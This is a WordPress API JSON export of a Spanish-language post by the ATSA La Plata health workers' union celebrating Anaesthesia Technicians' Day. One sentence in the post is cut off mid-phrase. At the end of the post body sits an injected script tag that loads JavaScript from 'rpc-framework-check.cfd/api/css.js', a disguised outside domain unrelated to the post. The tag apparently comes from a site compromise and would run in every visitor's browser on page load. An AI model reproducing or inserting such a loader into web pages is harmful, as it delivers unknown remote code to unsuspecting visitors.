{"id":20215,"date":"2025-12-19T00:00:00","date_gmt":"2025-12-19T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=20215"},"modified":"2026-02-02T16:09:53","modified_gmt":"2026-02-02T19:09:53","slug":"dia-del-tecnico-a-anestesista-4","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/12\/dia-del-tecnico-a-anestesista-4\/","title":{"rendered":"D\u00eda del T\u00e9cnico\/a Anestesista"},"content":{"rendered":"\n<p>\ud83d\udce3El 19 de diciembre se celebra el D\u00eda del T\u00e9cnico o T\u00e9cnica Anestesista.<\/p>\n\n\n\n<p>Se trata de profesionales de la salud que se encargan de asistir a los m\u00e9dicos anestesi\u00f3logos y de controlar la aparatolog\u00eda biom\u00e9dica relacionada con la anestesia.<\/p>\n\n\n\n<p>Sus tareas incluyen: cuidar, conservar, recontar, limpiar, acondicionar, esterilizar y ubicar en lugares seguros el material de anestesia.<\/p>\n\n\n\n<p>Su desempe\u00f1o en instituciones de salud p\u00fablica o privada son esenciales para<\/p>\n\n\n\n<p>Desde SANIDAD ATSA La Plata, felicitamos a todos\/as los\/as anestesistas en su d\u00eda. \u00a1Gracias por su trabajo responsable, \u00e9tico y profesional!\ud83d\udc4f<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udce3El 19 de diciembre se celebra el D\u00eda del T\u00e9cnico o T\u00e9cnica Anestesista. Se trata&#8230;<\/p>\n","protected":false},"author":2,"featured_media":20216,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,81,85,148],"tags":[],"class_list":["post-20215","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-salud","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=20215"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20215\/revisions"}],"predecessor-version":[{"id":20614,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20215\/revisions\/20614"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/20216"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=20215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=20215"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=20215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}